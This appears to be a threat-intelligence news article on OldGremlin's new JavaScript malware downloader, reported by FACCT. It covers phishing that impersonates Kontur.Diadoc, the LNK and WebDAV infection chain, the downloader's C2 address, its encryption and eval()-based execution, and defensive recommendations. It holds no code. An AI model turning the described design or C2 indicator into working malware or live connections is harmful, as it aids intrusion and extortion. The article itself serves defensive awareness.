The notorious ransomware group OldGremlin has resurfaced with a new sophisticated attack targeting Russian companies, particularly in the petrochemical sector. Cybersecurity experts at FACCT have uncovered a novel tool in the group’s arsenal: OldGremlin.JsDownloader, a JavaScript-based malware downloader that marks a significant evolution in their tactics.

Anatomy of the Attack: Impersonation and Deception

The attack vector involves a meticulously crafted phishing email, purportedly sent from a Diadoc employee named Olga Makarova. The email, targeting an unnamed Russian petrochemical company, cleverly mimics legitimate correspondence from Kontur.Diadoc, a well-known document management service. This impersonation tactic, previously observed in OldGremlin’s operations, demonstrates the group’s continued focus on social engineering.

The malicious email contains a link leading to a zip archive with an embedded LNK file. When executed, this file initiates a connection to a WebDAV server, a method consistent with OldGremlin’s past attacks. The payload then downloads and runs a Node.js interpreter, setting the stage for the deployment of the new OldGremlin.JsDownloader.

Technical Deep Dive: OldGremlin.JsDownloader

The heart of this attack lies in the OldGremlin.JsDownloader, a sophisticated JavaScript-based tool designed to fetch and execute arbitrary JavaScript code. This downloader employs several advanced techniques:

• Connects to a command-and-control (C2) server at 157.230.18.205:80
• Utilizes a challenge-response mechanism with a 32-byte random data set
• Implements public key cryptography for server authentication
• Uses RC4 encryption with an MD5-hashed key for data obfuscation
• Leverages the eval() function to execute downloaded JavaScript code

This multi-layered approach significantly enhances the malware’s ability to evade detection and complicates analysis efforts by cybersecurity researchers.

Implications and Defensive Measures

The reemergence of OldGremlin with enhanced capabilities poses a serious threat to Russian businesses, especially those in critical sectors like petrochemicals. The group’s history of demanding substantial ransoms, reaching up to 1 billion rubles in 2022, underscores the potential financial impact of these attacks.

Organizations must prioritize cybersecurity measures to defend against such sophisticated threats. Key recommendations include:

• Implementing robust email filtering and security awareness training to combat phishing attempts
• Regularly updating and patching systems to address known vulnerabilities
• Employing advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating JavaScript-based threats
• Conducting regular security audits and penetration testing to identify potential weaknesses in organizational defenses

As cyber threats continue to evolve, staying informed about the latest attack vectors and maintaining a proactive security posture is crucial for organizations across all sectors. The OldGremlin case serves as a stark reminder of the persistent and adaptive nature of modern cybercriminal groups, emphasizing the need for continuous vigilance and security innovation in the face of ever-changing threats.